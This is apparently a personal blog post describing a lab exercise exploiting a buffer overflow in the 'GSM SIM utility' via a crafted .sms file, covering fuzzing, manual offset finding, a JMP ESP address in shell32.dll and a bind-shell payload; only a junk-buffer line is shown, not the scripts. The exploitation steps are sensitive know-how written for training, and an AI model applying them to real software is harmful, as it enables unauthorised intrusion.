Assalamu'alaikum wr. wb..
Hi...friend, today we are try to exploit an application name GSM SIM utility v. 515. There were something interested experience i've got while exploiting this application, want to know ...lets get it on ^^
1. As usual prepare application in our LAB,and analyze it.
and after analyze it for about 1 hour, we found that, SIM editor have vulnerabilty using file.sms
2. Make fuzzer
Now we try to sent few junk into the application, here are the script
Here we are the first "interesting thing", SIM Editor finally crash after we load the file(exploit.sms) but after we read the registry using Ollydbg its kind a SEH buffer overflow method, but our instructor said that it can use Direct return method. So i have to try again find the perfect junk to sent to make it suddenly crash.
junk = "\x41" * 1900
After decreased junk step by step, finally SIM editor suddenly crash using 1900 junk.
3. Find the offset
Next step, we make 1900 pattern using pattern_create.rb and take the codes into our buffer. But what happen is SIM Editor failed to crash....OMG, what we have to do next???? Finally we know, that this application can't read ASCII character or we can't use pattern to automatically find the offset. So we have to find it manually..(hahaha)
Later, after patienly divide and search the offset we found the way and change fuzzer code
4. JMP ESP Command
Next, we can use shell32.dll executable module and find address of it
We can use bind shell payload codes and take the code into fuzzer
After we got all codes we need, we are gonna put all codes into our final fuzzer, one important thing we should remember is that SIM Editor cant read ASCII char or encoder char (\x), so we modified the codes like this
Last step is fuzzing SIM Editor and telnet it....
Alhamdulillah...we've done it !!....
Wassalamu'alaikum wr. wb
Tidak ada komentar:
Posting Komentar